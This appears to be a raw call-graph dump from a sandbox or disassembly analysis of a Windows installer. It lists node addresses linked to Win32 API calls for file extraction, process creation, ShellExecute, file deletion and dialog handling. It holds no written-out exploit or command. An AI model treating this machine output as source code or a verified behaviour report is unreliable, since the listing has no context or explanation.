API calls 4757->4767 4789 40584a DestroyWindow 4757->4789 4802 403d6b 4757->4802 4760 40557d 4758->4760 4763 405585 4758->4763 4764 4055cc SendMessageW 4758->4764 
4765 405598 4758->4765 4759->4758 4759->4761 4816 403d44 4760->4816 4762->4757 4763->4760 4763->4764 4764->4753 4768 4055a0 4765->4768 4769 4055b5 4765->4769 4767->4757 4813 40141d 4768->4813 4772 40141d 80 API calls 4769->4772 4770 4055b3 4770->4753 4773 4055bc 4772->4773 4773->4753 4773->4760 4775 405731 GetDlgItem 4776 405746 4775->4776 4777 40574f ShowWindow KiUserCallbackDispatcher 4775->4777 4776->4777 4805 403db1 EnableWindow 4777->4805 4779 405779 EnableWindow 4782 40578d 4779->4782 4780 405792 GetSystemMenu EnableMenuItem SendMessageW 4781 4057c2 SendMessageW 4780->4781 4780->4782 4781->4782 4782->4780 4806 403dc4 SendMessageW 4782->4806 4807 406035 lstrcpynW 4782->4807 4785 4057f0 lstrlenW 4786 406831 18 API calls 4785->4786 4787 405806 SetWindowTextW 4786->4787 4808 40139d 4787->4808 4789->4746 4790 405864 CreateDialogParamW 4789->4790 4790->4746 4791 405897 4790->4791 4792 403d6b 19 API calls 4791->4792 4793 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4792->4793 4794 40139d 80 API calls 4793->4794 4795 4058e8 4794->4795 4795->4761 4796 4058f0 ShowWindow 4795->4796 4797 403ddb SendMessageW 4796->4797 4798 405908 4797->4798 4798->4746 4800 403df3 4799->4800 4801 403de4 SendMessageW 4799->4801 4800->4757 4801->4800 4803 406831 18 API calls 4802->4803 4804 403d76 SetDlgItemTextW 4803->4804 4804->4775 4805->4779 4806->4782 4807->4785 4811 4013a4 4808->4811 4809 401410 4809->4757 4811->4809 4812 4013dd MulDiv SendMessageW 4811->4812 4833 4015a0 4811->4833 4812->4811 4814 40139d 80 API calls 4813->4814 4815 401432 4814->4815 4815->4760 4817 403d51 SendMessageW 4816->4817 4818 403d4b 4816->4818 4817->4770 4818->4817 4820 403e0b GetWindowLongW 4819->4820 4830 403e94 4819->4830 4821 403e1c 4820->4821 4820->4830 4822 403e2b GetSysColor 4821->4822 4823 403e2e 4821->4823 4822->4823 4824 403e34 SetTextColor 4823->4824 4825 403e3e SetBkMode 4823->4825 4824->4825 4826 403e56 GetSysColor 4825->4826 4827 403e5c 4825->4827 4826->4827 4828 403e63 SetBkColor 
4827->4828 4829 403e6d 4827->4829 4828->4829 4829->4830 4831 403e80 DeleteObject 4829->4831 4832 403e87 CreateBrushIndirect 4829->4832 4830->4761 4831->4832 4832->4830 4834 4015fa 4833->4834 4914 40160c 4833->4914 4835 401601 4834->4835 4836 401742 4834->4836 4837 401962 4834->4837 4838 4019ca 4834->4838 4839 40176e 4834->4839 4840 401650 4834->4840 4841 4017b1 4834->4841 4842 401672 4834->4842 4843 401693 4834->4843 4844 401616 4834->4844 4845 4016d6 4834->4845 4846 401736 4834->4846 4847 401897 4834->4847 4848 4018db 4834->4848 4849 40163c 4834->4849 4850 4016bd 4834->4850 4834->4914 4857 4062cf 11 API calls 4835->4857 4863 401751 ShowWindow 4836->4863 4864 401758 4836->4864 4854 40145c 18 API calls 4837->4854 4861 40145c 18 API calls 4838->4861 4851 40145c 18 API calls 4839->4851 4878 4062cf 11 API calls 4840->4878 4855 40145c 18 API calls 4841->4855 4852 40145c 18 API calls 4842->4852 4856 401446 18 API calls 4843->4856 4860 40145c 18 API calls 4844->4860 4876 401446 18 API calls 4845->4876 4845->4914 4846->4914 4971 405f7d wsprintfW 4846->4971 4853 40145c 18 API calls 4847->4853 4858 40145c 18 API calls 4848->4858 4862 401647 PostQuitMessage 4849->4862 4849->4914 4859 4062cf 11 API calls 4850->4859 4866 401775 4851->4866 4867 401678 4852->4867 4868 40189d 4853->4868 4869 401968 GetFullPathNameW 4854->4869 4870 4017b8 4855->4870 4871 40169a 4856->4871 4857->4914 4872 4018e2 4858->4872 4873 4016c7 SetForegroundWindow 4859->4873 4874 40161c 4860->4874 4875 4019d1 SearchPathW 4861->4875 4862->4914 4863->4864 4865 401765 ShowWindow 4864->4865 4864->4914 4865->4914 4879 4062cf 11 API calls 4866->4879 4880 4062cf 11 API calls 4867->4880 4962 406301 FindFirstFileW 4868->4962 4882 4019a1 4869->4882 4883 40197f 4869->4883 4941 4062cf lstrlenW wvsprintfW 4870->4941 4885 4062cf 11 API calls 4871->4885 4886 40145c 18 API calls 4872->4886 4873->4914 4887 4062cf 11 API calls 4874->4887 4875->4846 4875->4914 4876->4914 4888 401664 4878->4888 4889 401785 SetFileAttributesW 
4879->4889 4890 401683 4880->4890 4903 4019b8 GetShortPathNameW 4882->4903 4882->4914 4883->4882 4909 406301 2 API calls 4883->4909 4893 4016a7 4885->4893 4894 4018eb 4886->4894 4895 401627 4887->4895 4896 40139d 65 API calls 4888->4896 4897 40179a 4889->4897 4889->4914 4907 404f9e 25 API calls 4890->4907 4901 4016b1 Sleep 4893->4901 4902 4016ae 4893->4902 4904 40145c 18 API calls 4894->4904 4950 404f9e 4895->4950 4896->4914 4906 4062cf 11 API calls 4897->4906 4898 4018c2 4910 4062cf 11 API calls 4898->4910 4899 4018a9 4908 4062cf 11 API calls 4899->4908 4901->4914 4902->4901 4903->4914 4912 4018f5 4904->4912 4906->4914 4907->4914 4908->4914 4913 401991 4909->4913 4910->4914 4911 4017d4 4915 401864 4911->4915 4918 405d32 CharNextW 4911->4918 4931 4062cf 11 API calls 4911->4931 4916 4062cf 11 API calls 4912->4916 4913->4882 4970 406035 lstrcpynW 4913->4970 4914->4811 4915->4890 4917 40186e 4915->4917 4919 401902 MoveFileW 4916->4919 4920 404f9e 25 API calls 4917->4920 4922 4017e6 CreateDirectoryW 4918->4922 4923 401912 4919->4923 4924 40191e 4919->4924 4925 401875 4920->4925 4922->4911 4926 4017fe GetLastError 4922->4926 4923->4890 4928 401942 4924->4928 4932 406301 2 API calls 4924->4932 4961 406035 lstrcpynW 4925->4961 4929 401827 GetFileAttributesW 4926->4929 4930 40180b GetLastError 4926->4930 4934 4062cf 11 API calls 4928->4934 4929->4911 4935 4062cf 11 API calls 4930->4935 4931->4911 4936 401929 4932->4936 4933 401882 SetCurrentDirectoryW 4933->4914 4937 40195c 4934->4937 4935->4911 4936->4928 4965 406c94 4936->4965 4937->4914 4940 404f9e 25 API calls 4940->4928 4972 406113 4941->4972 4944 405d85 CharNextW CharNextW 4945 405da2 4944->4945 4949 405db4 4944->4949 4947 405daf CharNextW 4945->4947 4945->4949 4946 405dd8 4946->4911 4947->4946 4948 405d32 CharNextW 4948->4949 4949->4946 4949->4948 4952 404fb7 4950->4952 4957 40505b 4950->4957 4951 404fd5 lstrlenW 4954 404fe3 lstrlenW 4951->4954 4955 404ffe 4951->4955 4952->4951 4953 406831 18 API calls 4952->4953 
4953->4951 4956 404ff5 lstrcatW 4954->4956 4954->4957 4958 405011 4955->4958 4959 405004 SetWindowTextW 4955->4959 4956->4955 4957->4914 4958->4957 4960 405017 SendMessageW SendMessageW SendMessageW 4958->4960 4959->4958 4960->4957 4961->4933 4963 4018a5 4962->4963 4964 406317 FindClose 4962->4964 4963->4898 4963->4899 4964->4963 4986 406328 GetModuleHandleA 4965->4986 4969 401936 4969->4940 4970->4882 4971->4914 4973 40611f 4972->4973 4976 40613c 4972->4976 4974 4017c9 4973->4974 4975 406129 CloseHandle 4973->4975 4974->4944 4975->4974 4976->4974 4977 4061b3 4976->4977 4978 406159 4976->4978 4977->4974 4980 4061bc lstrcatW lstrlenW WriteFile 4977->4980 4979 406162 GetFileAttributesW 4978->4979 4978->4980 4985 405e7c GetFileAttributesW CreateFileW 4979->4985 4980->4974 4982 40617e 4982->4974 4983 4061a8 SetFilePointer 4982->4983 4984 40618e WriteFile 4982->4984 4983->4977 4984->4983 4985->4982 4987 406340 LoadLibraryA 4986->4987 4988 40634b GetProcAddress 4986->4988 4987->4988 4989 406359 4987->4989 4988->4989 4989->4969 4990 406ac5 lstrcpyW 4989->4990 4991 406b13 GetShortPathNameW 4990->4991 4992 406aea 4990->4992 4994 406b2c 4991->4994 4995 406c8e 4991->4995 5016 405e7c GetFileAttributesW CreateFileW 4992->5016 4994->4995 4996 406b34 WideCharToMultiByte 4994->4996 4995->4969 4996->4995 4998 406b51 WideCharToMultiByte 4996->4998 4997 406af3 CloseHandle GetShortPathNameW 4997->4995 4999 406b0b 4997->4999 4998->4995 5000 406b69 wsprintfA 4998->5000 4999->4991 4999->4995 5001 406831 18 API calls 5000->5001 5002 406b95 5001->5002 5017 405e7c GetFileAttributesW CreateFileW 5002->5017 5004 406ba2 5004->4995 5005 406baf GetFileSize GlobalAlloc 5004->5005 5006 406bd0 ReadFile 5005->5006 5007 406c84 CloseHandle 5005->5007 5006->5007 5008 406bea 5006->5008 5007->4995 5008->5007 5018 405de2 lstrlenA 5008->5018 5011 406c03 lstrcpyA 5014 406c25 5011->5014 5012 406c17 5013 405de2 4 API calls 5012->5013 5013->5014 5015 406c5c SetFilePointer WriteFile GlobalFree 5014->5015 
5015->5007 5016->4997 5017->5004 5019 405e23 lstrlenA 5018->5019 5020 405e2b 5019->5020 5021 405dfc lstrcmpiA 5019->5021 5020->5011 5020->5012 5021->5020 5022 405e1a CharNextA 5021->5022 5022->5019 6712 402da5 6713 4030e3 6712->6713 6714 402dac 6712->6714 6715 401446 18 API calls 6714->6715 6716 402db8 6715->6716 6717 402dbf SetFilePointer 6716->6717 6717->6713 6718 402dcf 6717->6718 6718->6713 6720 405f7d wsprintfW 6718->6720 6720->6713 6721 4049a8 GetDlgItem GetDlgItem 6722 4049fe 7 API calls 6721->6722 6727 404c16 6721->6727 6723 404aa2 DeleteObject 6722->6723 6724 404a96 SendMessageW 6722->6724 6725 404aad 6723->6725 6724->6723 6728 404ae4 6725->6728 6730 406831 18 API calls 6725->6730 6726 404cfb 6729 404da0 6726->6729 6734 404c09 6726->6734 6740 404d4a SendMessageW 6726->6740 6727->6726 6738 40487a 5 API calls 6727->6738 6753 404c86 6727->6753 6733 403d6b 19 API calls 6728->6733 6731 404db5 6729->6731 6732 404da9 SendMessageW 6729->6732 6736 404ac6 SendMessageW SendMessageW 6730->6736 6742 404dc7 ImageList_Destroy 6731->6742 6743 404dce 6731->6743 6750 404dde 6731->6750 6732->6731 6739 404af8 6733->6739 6735 403df6 8 API calls 6734->6735 6741 404f97 6735->6741 6736->6725 6737 404ced SendMessageW 6737->6726 6738->6753 6744 403d6b 19 API calls 6739->6744 6740->6734 6746 404d5f SendMessageW 6740->6746 6742->6743 6747 404dd7 GlobalFree 6743->6747 6743->6750 6757 404b09 6744->6757 6745 404f48 6745->6734 6751 404f5d ShowWindow GetDlgItem ShowWindow 6745->6751 6748 404d72 6746->6748 6747->6750 6754 404d83 SendMessageW 6748->6754 6749 404bd6 GetWindowLongW SetWindowLongW 6752 404bf0 6749->6752 6750->6745 6758 40141d 80 API calls 6750->6758 6768 404e10 6750->6768 6751->6734 6755 404bf6 ShowWindow 6752->6755 6756 404c0e 6752->6756 6753->6726 6753->6737 6754->6729 6772 403dc4 SendMessageW 6755->6772 6773 403dc4 SendMessageW 6756->6773 6757->6749 6759 404bd0 6757->6759 6762 404b65 SendMessageW 6757->6762 6763 404b93 SendMessageW 6757->6763 6764 404ba7 SendMessageW 
6757->6764 6758->6768 6759->6749 6759->6752 6762->6757 6763->6757 6764->6757 6765 404e54 6766 404f1f InvalidateRect 6765->6766 6771 404ecd SendMessageW SendMessageW 6765->6771 6766->6745 6767 404f35 6766->6767 6770 4043d9 21 API calls 6767->6770 6768->6765 6769 404e3e SendMessageW 6768->6769 6769->6765 6770->6745 6771->6765 6772->6734 6773->6727 5030 4030a9 SendMessageW 5031 4030c2 InvalidateRect 5030->5031 5032 4030e3 5030->5032 5031->5032 5033 6ffb1791 5034 6ffb17c2 5033->5034 5042 6ffb2025 5034->5042 5036 6ffb17d6 GetDlgItem GetWindowRect MapWindowPoints CreateDialogParamW 5037 6ffb1823 SetWindowPos SetWindowLongW GetProcessHeap HeapAlloc 5036->5037 5038 6ffb1817 5036->5038 5048 6ffb2085 wsprintfW 5037->5048 5045 6ffb1e83 5038->5045 5041 6ffb1821 5051 6ffb1e34 5042->5051 5044 6ffb203f 5044->5036 5046 6ffb1e8c GlobalAlloc lstrcpynW 5045->5046 5047 6ffb1ec6 5045->5047 5046->5047 5047->5041 5049 6ffb1e83 2 API calls 5048->5049 5050 6ffb20b2 5049->5050 5050->5041 5052 6ffb1e7d 5051->5052 5053 6ffb1e3d 5051->5053 5052->5044 5053->5052 5054 6ffb1e6d GlobalFree 5053->5054 5055 6ffb1e59 lstrcpynW 5053->5055 5054->5052 5055->5054 6013 6ffb1b95 6014 6ffb2025 2 API calls 6013->6014 6015 6ffb1b9b IsWindow 6014->6015 6016 6ffb1ba8 6015->6016 6017 6ffb1baf 6015->6017 6019 6ffb1e83 2 API calls 6016->6019 6018 6ffb13f8 GetPropW 6017->6018 6018->6016 6020 6ffb1bc2 6019->6020 5056 4038af #17 SetErrorMode OleInitialize 5057 406328 3 API calls 5056->5057 5058 4038f2 SHGetFileInfoW 5057->5058 5129 406035 lstrcpynW 5058->5129 5060 40391d GetCommandLineW 5130 406035 lstrcpynW 5060->5130 5062 40392f GetModuleHandleW 5063 403947 5062->5063 5064 405d32 CharNextW 5063->5064 5065 403956 CharNextW 5064->5065 5074 403968 5065->5074 5066 403a02 5067 403a21 GetTempPathW 5066->5067 5131 4037f8 5067->5131 5069 403a37 5071 403a3b GetWindowsDirectoryW lstrcatW 5069->5071 5072 403a5f DeleteFileW 5069->5072 5070 405d32 CharNextW 5070->5074 5075 4037f8 11 API calls 5071->5075 5139 4035b3 GetTickCount 
GetModuleFileNameW 5072->5139 5074->5066 5074->5070 5087 403a04 5074->5087 5077 403a57 5075->5077 5076 403a73 5078 403af8 5076->5078 5079 403add 5076->5079 5081 405d32 CharNextW 5076->5081 5077->5072 5077->5078 5241 403885 5078->5241 5167 405958 5079->5167 5093 403a8a 5081->5093 5084 403aed 5088 406113 9 API calls 5084->5088 5085 403bfa 5089 403c7d 5085->5089 5091 406328 3 API calls 5085->5091 5086 403b0d 5248 405ccc 5086->5248 5224 406035 lstrcpynW 5087->5224 5088->5078 5095 403c09 5091->5095 5096 403b23 lstrcatW lstrcmpiW 5093->5096 5097 403ab5 5093->5097 5098 406328 3 API calls 5095->5098 5096->5078 5100 403b3f CreateDirectoryW SetCurrentDirectoryW 5096->5100 5225 4067aa 5097->5225 5103 403c12 5098->5103 5101 403b62 5100->5101 5102 403b57 5100->5102 5253 406035 lstrcpynW 5101->5253 5252 406035 lstrcpynW 5102->5252 5107 406328 3 API calls 5103->5107 5110 403c1b 5107->5110 5109 403b70 5254 406035 lstrcpynW 5109->5254 5113 403c69 ExitWindowsEx 5110->5113 5116 403c29 GetCurrentProcess 5110->5116 5111 403ad2 5240 406035 lstrcpynW 5111->5240 5113->5089 5115 403c76 5113->5115 5117 40141d 80 API calls 5115->5117 5119 403c39 5116->5119 5117->5089 5118 406831 18 API calls 5120 403b98 DeleteFileW 5118->5120 5119->5113 5121 403ba5 CopyFileW 5120->5121 5126 403b7f 5120->5126 5121->5126 5122 403bee 5123 406c94 42 API calls 5122->5123 5123->5078 5124 406c94 42 API calls 5124->5126 5125 406831 18 API calls 5125->5126 5126->5118 5126->5122 5126->5124 5126->5125 5128 403bd9 CloseHandle 5126->5128 5255 405c6b CreateProcessW 5126->5255 5128->5126 5129->5060 5130->5062 5132 406064 5 API calls 5131->5132 5133 403804 5132->5133 5134 40380e 5133->5134 5258 40674e lstrlenW CharPrevW 5133->5258 5134->5069 5265 405e7c GetFileAttributesW CreateFileW 5139->5265 5141 4035f3 5161 403603 5141->5161 5266 406035 lstrcpynW 5141->5266 5143 403619 5267 40677d lstrlenW 5143->5267 5147 40362a GetFileSize 5148 403726 5147->5148 5166 403641 5147->5166 5274 4032d2 5148->5274 5150 40372f 5152 40376b 
GlobalAlloc 5150->5152 5150->5161 5285 403368 SetFilePointer 5150->5285 5286 403368 SetFilePointer 5152->5286 5155 4037e9 5158 4032d2 6 API calls 5155->5158 5156 403786 5287 40337f 5156->5287 5157 40374c 5160 403336 ReadFile 5157->5160 5158->5161 5162 403757 5160->5162 5161->5076 5162->5152 5162->5161 5163 4032d2 6 API calls 5163->5166 5164 403792 5164->5161 5164->5164 5165 4037c0 SetFilePointer 5164->5165 5165->5161 5166->5148 5166->5155 5166->5161 5166->5163 5272 403336 ReadFile 5166->5272 5168 406328 3 API calls 5167->5168 5169 40596c 5168->5169 5170 405972 5169->5170 5171 405984 5169->5171 5322 405f7d wsprintfW 5170->5322 5172 405eff 3 API calls 5171->5172 5173 4059b5 5172->5173 5175 4059d4 lstrcatW 5173->5175 5177 405eff 3 API calls 5173->5177 5176 405982 5175->5176 5313 403ec1 5176->5313 5177->5175 5180 4067aa 18 API calls 5181 405a06 5180->5181 5182 405a9c 5181->5182 5184 405eff 3 API calls 5181->5184 5183 4067aa 18 API calls 5182->5183 5185 405aa2 5183->5185 5186 405a38 5184->5186 5187 405ab2 5185->5187 5188 406831 18 API calls 5185->5188 5186->5182 5192 405a5b lstrlenW 5186->5192 5195 405d32 CharNextW 5186->5195 5189 405ad2 LoadImageW 5187->5189 5324 403ea0 5187->5324 5188->5187 5190 405b92 5189->5190 5191 405afd RegisterClassW 5189->5191 5194 40141d 80 API calls 5190->5194 5193 405b45 SystemParametersInfoW CreateWindowExW 5191->5193 5223 405b9c 5191->5223 5196 405a69 lstrcmpiW 5192->5196 5197 405a8f 5192->5197 5193->5190 5200 405b98 5194->5200 5201 405a56 5195->5201 5196->5197 5202 405a79 GetFileAttributesW 5196->5202 5199 40674e 3 API calls 5197->5199 5204 405a95 5199->5204 5208 403ec1 19 API calls 5200->5208 5200->5223 5201->5192 5205 405a85 5202->5205 5203 405ac8 5203->5189 5323 406035 lstrcpynW 5204->5323 5205->5197 5206 40677d 2 API calls 5205->5206 5206->5197 5209 405ba9 5208->5209 5210 405bb5 ShowWindow LoadLibraryW 5209->5210 5211 405c38 5209->5211 5213 405bd4 LoadLibraryW 5210->5213 5214 405bdb GetClassInfoW 5210->5214 5329 405073 OleInitialize 
5211->5329 5213->5214 5216 405c05 DialogBoxParamW 5214->5216 5217 405bef GetClassInfoW RegisterClassW 5214->5217 5215 405c3e 5218 405c42 5215->5218 5219 405c5a 5215->5219 5220 40141d 80 API calls 5216->5220 5217->5216 5222 40141d 80 API calls 5218->5222 5218->5223 5221 40141d 80 API calls 5219->5221 5220->5223 5221->5223 5222->5223 5223->5084 5224->5067 5339 406035 lstrcpynW 5225->5339 5227 4067bb 5228 405d85 4 API calls 5227->5228 5229 4067c1 5228->5229 5230 406064 5 API calls 5229->5230 5237 403ac3 5229->5237 5236 4067d1 5230->5236 5231 406809 lstrlenW 5232 406810 5231->5232 5231->5236 5233 40674e 3 API calls 5232->5233 5235 406816 GetFileAttributesW 5233->5235 5234 406301 2 API calls 5234->5236 5235->5237 5236->5231 5236->5234 5236->5237 5238 40677d 2 API calls 5236->5238 5237->5078 5239 406035 lstrcpynW 5237->5239 5238->5231 5239->5111 5240->5079 5242 40389d 5241->5242 5243 40388f CloseHandle 5241->5243 5340 403caf 5242->5340 5243->5242 5249 405ce1 5248->5249 5250 403b1b ExitProcess 5249->5250 5251 405cf7 MessageBoxIndirectW 5249->5251 5251->5250 5252->5101 5253->5109 5254->5126 5256 405ca6 5255->5256 5257 405c9a CloseHandle 5255->5257 5256->5126 5257->5256 5259 403816 CreateDirectoryW 5258->5259 5260 40676b lstrcatW 5258->5260 5261 405eab 5259->5261 5260->5259 5262 405eb8 GetTickCount GetTempFileNameW 5261->5262 5263 405eee 5262->5263 5264 40382a 5262->5264 5263->5262 5263->5264 5264->5069 5265->5141 5266->5143 5268 40678c 5267->5268 5269 406792 CharPrevW 5268->5269 5270 40361f 5268->5270 5269->5268 5269->5270 5271 406035 lstrcpynW 5270->5271 5271->5147 5273 403357 5272->5273 5273->5166 5275 4032f3 5274->5275 5276 4032db 5274->5276 5279 403303 GetTickCount 5275->5279 5280 4032fb 5275->5280 5277 4032e4 DestroyWindow 5276->5277 5278 4032eb 5276->5278 5277->5278 5278->5150 5282 403311 CreateDialogParamW ShowWindow 5279->5282 5283 403334 5279->5283 5308 40635e 5280->5308 5282->5283 5283->5150 5285->5157 5286->5156 5288 40339a 5287->5288 5289 4033c7 5288->5289 5312 
403368 SetFilePointer 5288->5312 5290 403336 ReadFile 5289->5290 5292 4033d2 5290->5292 5293 403546 5292->5293 5294 4033eb GetTickCount 5292->5294 5302 4033d6 5292->5302 5295 40354a 5293->5295 5299 40356e 5293->5299 5294->5302 5307 403438 5294->5307 5296 403336 ReadFile 5295->5296 5296->5302 5297 403336 ReadFile 5297->5307 5298 403336 ReadFile 5298->5299 5299->5298 5300 40358d WriteFile 5299->5300 5299->5302 5301 4035a1 5300->5301 5300->5302 5301->5299 5301->5302 5302->5164 5303 40348a GetTickCount 5303->5307 5304 4034af MulDiv wsprintfW 5305 404f9e 25 API calls 5304->5305 5305->5307 5306 4034f3 WriteFile 5306->5302 5306->5307 5307->5297 5307->5302 5307->5303 5307->5304 5307->5306 5309 40637b PeekMessageW 5308->5309 5310 406371 DispatchMessageW 5309->5310 5311 403301 5309->5311 5310->5309 5311->5150 5312->5289 5314 403ed5 5313->5314 5337 405f7d wsprintfW 5314->5337 5316 403f49 5317 406831 18 API calls 5316->5317 5318 403f55 SetWindowTextW 5317->5318 5319 403f70 5318->5319 5320 403f8b 5319->5320 5321 406831 18 API calls 5319->5321 5320->5180 5321->5319 5322->5176 5323->5182 5338 406035 lstrcpynW 5324->5338 5326 403eb4 5327 40674e 3 API calls 5326->5327 5328 403eba lstrcatW 5327->5328 5328->5203 5330 403ddb SendMessageW 5329->5330 5334 405096 5330->5334 5331 403ddb SendMessageW 5332 4050d1 OleUninitialize 5331->5332 5332->5215 5333 4062cf 11 API calls 5333->5334 5334->5333 5335 40139d 80 API calls 5334->5335 5336 4050c1 5334->5336 5335->5334 5336->5331 5337->5316 5338->5326 5339->5227 5341 403cbd 5340->5341 5342 4038a2 5341->5342 5343 403cc2 FreeLibrary GlobalFree 5341->5343 5344 406cc7 5342->5344 5343->5342 5343->5343 5345 4067aa 18 API calls 5344->5345 5346 406cda 5345->5346 5347 406ce3 DeleteFileW 5346->5347 5348 406cfa 5346->5348 5349 4038ae OleUninitialize 5347->5349 5350 406e77 5348->5350 5391 406035 lstrcpynW 5348->5391 5349->5085 5349->5086 5350->5349 5353 406e84 5350->5353 5357 406301 2 API calls 5350->5357 5352 406d25 5354 406d39 5352->5354 5355 406d2f 
lstrcatW 5352->5355 5361 4062cf 11 API calls 5353->5361 5358 40677d 2 API calls 5354->5358 5356 406d3f 5355->5356 5360 406d4f lstrcatW 5356->5360 5362 406d57 lstrlenW FindFirstFileW 5356->5362 5359 406e90 5357->5359 5358->5356 5359->5349 5363 40674e 3 API calls 5359->5363 5360->5362 5361->5349 5364 406e67 5362->5364 5377 406d7e 5362->5377 5365 406e9a 5363->5365 5364->5350 5367 4062cf 11 API calls 5365->5367 5366 405d32 CharNextW 5366->5377 5368 406ea5 5367->5368 5369 405e5c 2 API calls 5368->5369 5370 406ead RemoveDirectoryW 5369->5370 5374 406ef0 5370->5374 5375 406eb9 5370->5375 5371 406e44 FindNextFileW 5373 406e5c FindClose 5371->5373 5371->5377 5373->5364 5378 404f9e 25 API calls 5374->5378 5375->5353 5376 406ebf 5375->5376 5379 4062cf 11 API calls 5376->5379 5377->5366 5377->5371 5381 406cc7 72 API calls 5377->5381 5387 404f9e 25 API calls 5377->5387 5388 4062cf 11 API calls 5377->5388 5389 404f9e 25 API calls 5377->5389 5390 406c94 42 API calls 5377->5390 5392 406035 lstrcpynW 5377->5392 5393 405e5c GetFileAttributesW 5377->5393 5378->5349 5380 406ec9 5379->5380 5383 404f9e 25 API calls 5380->5383 5381->5377 5385 406ed3 5383->5385 5386 406c94 42 API calls 5385->5386 5386->5349 5387->5371 5388->5377 5389->5377 5390->5377 5391->5352 5392->5377 5394 405e79 DeleteFileW 5393->5394 5395 405e6b SetFileAttributesW 5393->5395 5394->5377 5395->5394 5428 6ffb188a GetProcessHeap HeapAlloc 5429 6ffb18c1 5428->5429 5430 6ffb18d0 5428->5430 5432 6ffb1e83 2 API calls 5429->5432 5431 6ffb1e34 2 API calls 5430->5431 5433 6ffb18d8 5431->5433 5434 6ffb18cb 5432->5434 5435 6ffb18dc 5433->5435 5463 6ffb2055 5433->5463 5436 6ffb1e83 2 API calls 5435->5436 5438 6ffb18e6 GetProcessHeap 5436->5438 5440 6ffb1b4d RtlFreeHeap 5438->5440 5439 6ffb18f5 5441 6ffb2055 2 API calls 5439->5441 5440->5434 5442 6ffb18fd 5441->5442 5466 6ffb1313 GetClientRect 5442->5466 5444 6ffb1915 5445 6ffb1e34 2 API calls 5444->5445 5446 6ffb191d 5445->5446 5446->5435 5447 6ffb1921 GetProcessHeap HeapReAlloc 
lstrcmpiW 5446->5447 5448 6ffb197c lstrcmpiW 5447->5448 5449 6ffb1961 5447->5449 5448->5449 5450 6ffb19a3 lstrcmpiW 5448->5450 5452 6ffb1a9c lstrcmpiW 5449->5452 5450->5449 5451 6ffb19ca lstrcmpiW 5450->5451 5451->5449 5453 6ffb19f1 lstrcmpiW 5451->5453 5454 6ffb1aa8 5452->5454 5455 6ffb1aad CreateWindowExW SetPropW SendMessageW SendMessageW 5452->5455 5453->5449 5456 6ffb1a15 lstrcmpiW 5453->5456 5454->5455 5457 6ffb1b3c 5455->5457 5458 6ffb1b21 SetWindowLongW 5455->5458 5456->5449 5459 6ffb1a39 lstrcmpiW 5456->5459 5460 6ffb2085 3 API calls 5457->5460 5458->5457 5459->5449 5461 6ffb1a5d lstrcmpiW 5459->5461 5462 6ffb1b42 GetProcessHeap 5460->5462 5461->5449 5462->5440 5464 6ffb1e34 2 API calls 5463->5464 5465 6ffb206f 5464->5465 5465->5439 5467 6ffb1e34 2 API calls 5466->5467 5468 6ffb134c 5467->5468 5482 6ffb1350 5468->5482 5483 6ffb128f lstrlenW CharPrevW 5468->5483 5471 6ffb1e34 2 API calls 5472 6ffb137a 5471->5472 5473 6ffb128f 4 API calls 5472->5473 5472->5482 5474 6ffb138e 5473->5474 5475 6ffb1e34 2 API calls 5474->5475 5476 6ffb13a0 5475->5476 5477 6ffb128f 4 API calls 5476->5477 5476->5482 5478 6ffb13b2 5477->5478 5479 6ffb1e34 2 API calls 5478->5479 5480 6ffb13c4 5479->5480 5481 6ffb128f 4 API calls 5480->5481 5480->5482 5481->5482 5482->5444 5484 6ffb12b4 5483->5484 5485 6ffb12bb MulDiv 5484->5485 5486 6ffb12ce 5484->5486 5489 6ffb12f6 5485->5489 5488 6ffb12d3 MapDialogRect 5486->5488 5486->5489 5488->5489 5489->5471 5665 401cb2 5666 40145c 18 API calls 5665->5666 5667 401c54 5666->5667 5668 401c64 5667->5668 5669 4062cf 11 API calls 5667->5669 5670 401c59 5669->5670 5671 406cc7 81 API calls 5670->5671 5671->5668 6774 6e9e236c 6775 6e9e2407 6774->6775 6776 6e9e23d1 6774->6776 6776->6775 6777 6e9e23e3 GlobalAlloc 6776->6777 6777->6776 6778 4021b5 6779 40145c 18 API calls 6778->6779 6780 4021bb 6779->6780 6781 40145c 18 API calls 6780->6781 6782 4021c4 6781->6782 6783 40145c 18 API calls 6782->6783 6784 4021cd 6783->6784 6785 40145c 18 API calls 
6784->6785 6786 4021d6 6785->6786 6787 404f9e 25 API calls 6786->6787 6788 4021e2 ShellExecuteW 6787->6788 6789 40220d 6788->6789 6792 40221b 6788->6792 6791 4062cf 11 API calls 6789->6791 6790 4062cf 11 API calls 6793 402230 6790->6793 6791->6792 6792->6790 6021 6e9e10e9 6024 6e9e1859 6021->6024 6023 6e9e1100 GlobalFree 6025 6e9e15a3 3 API calls 6024->6025 6026 6e9e185f 6025->6026 6027 6e9e1865 6026->6027 6028 6e9e1871 GlobalFree 6026->6028 6027->6023 6028->6023 6029 402238 6030 40145c 18 API calls 6029->6030 6031 40223e 6030->6031 6032 4062cf 11 API calls 6031->6032 6033 40224b 6032->6033 6034 404f9e 25 API calls 6033->6034 6035 402255 6034->6035 6036 405c6b 2 API calls 6035->6036 6037 40225b 6036->6037 6038 4022ac CloseHandle 6037->6038 6039 4062cf 11 API calls 6037->6039 6042 4030e3 6038->6042 6041 40226d 6039->6041 6041->6038 6043 402283 WaitForSingleObject 6041->6043 6045 40635e 2 API calls 6041->6045 6043->6041 6044 402291 GetExitCodeProcess 6043->6044 6044->6038 6046 4022a3 6044->6046 6045->6043 6048 405f7d wsprintfW 6046->6048 6048->6038 5685 401eb9 5686 401f24 5685->5686 5693 401ec6 5685->5693 5687 401f53 GlobalAlloc 5686->5687 5692 401f28 5686->5692 5690 406831 18 API calls 5687->5690 5688 401ed5 5689 4062cf 11 API calls 5688->5689 5703 401ee2 5689->5703 5696 401f46 5690->5696 5691 401f36 5709 406035 lstrcpynW 5691->5709 5692->5691 5697 4062cf 11 API calls 5692->5697 5693->5688 5694 401ef7 5693->5694 5707 406035 lstrcpynW 5694->5707 5699 402708 5696->5699 5700 402387 GlobalFree 5696->5700 5697->5691 5700->5699 5701 406831 18 API calls 5701->5703 5702 401f06 5708 406035 lstrcpynW 5702->5708 5703->5699 5703->5701 5705 401f15 5710 406035 lstrcpynW 5705->5710 5707->5702 5708->5705 5709->5696 5710->5699 6049 404039 6050 404096 6049->6050 6051 404046 lstrcpynA lstrlenA 6049->6051 6051->6050 6052 404077 6051->6052 6052->6050 6053 404083 GlobalFree 6052->6053 6053->6050 6794 6ffb1c01 6795 6ffb2025 2 API calls 6794->6795 6796 